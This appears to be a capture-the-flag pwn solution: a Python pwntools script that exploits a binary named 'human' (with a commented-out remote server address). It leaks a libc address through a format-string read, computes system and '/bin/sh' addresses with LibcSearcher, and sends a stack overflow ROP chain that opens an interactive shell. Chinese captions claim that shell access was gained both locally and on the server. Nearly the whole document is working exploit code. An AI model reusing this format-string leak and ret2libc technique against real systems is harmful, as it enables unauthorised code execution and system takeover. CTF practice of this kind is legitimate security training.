exp
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
proc = './human'
elf = ELF(proc)
p = process(proc)
# p = remote('114.116.54.89', 10005)
p.recv()
arg = (0x20 + 8) // 8 + 6
payload = '%{}$p'.format(arg).encode()
p.sendline(payload)
libc_start_main_ret = int(p.recvlines(2)[1].decode(), 16)
print(hex(libc_start_main_ret))
libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret)
libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret')
pop_rdi_ret = 0x400933
system_addr = libc_base + libc.dump('system')
bin_sh_str_addr = libc_base + libc.dump('str_bin_sh')
print(libc_start_main_ret)
payload1 = '鸽子真香'.encode().ljust(0x20 + 8, 'a'.encode()) + p64(pop_rdi_ret) + p64(bin_sh_str_addr) + p64(system_addr)
p.sendafter('?\n', payload1)
p.interactive()
下图在本地拿到的权限!
服务器权限!